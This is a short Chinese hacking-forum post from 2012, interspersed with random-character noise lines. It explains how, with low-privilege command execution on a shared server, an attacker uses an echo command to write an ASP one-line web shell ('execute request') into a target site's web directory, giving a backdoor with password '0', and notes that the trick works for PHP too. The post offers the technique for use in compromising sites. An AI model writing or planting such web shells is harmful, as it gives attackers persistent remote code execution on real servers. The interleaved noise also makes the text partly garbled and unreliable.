在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。/ x* g) U. D' O) D5 a
! Q [3 @" ^ o z7 ^/ L命令格式 ^8 l; Z) S6 r4 b% n, f
: Q+ O: l% H( N) P3 q, M
Echo 语句 >目标站绝对目录( ]% z3 y. c+ X: U
8 W# o1 P7 V/ b- o b# i
例如:
- v6 d+ Y! m. E' j* o3 W4 Y( q0 K8 r; H3 m
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
5 U! A) Q5 q" }" y# ]! r: c
/ W1 E) x* u9 B' y& F这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
. z1 `6 C/ }3 c0 W. U! d' F) k |
发表于 2012-9-23 14:40:24
收藏
支持
反对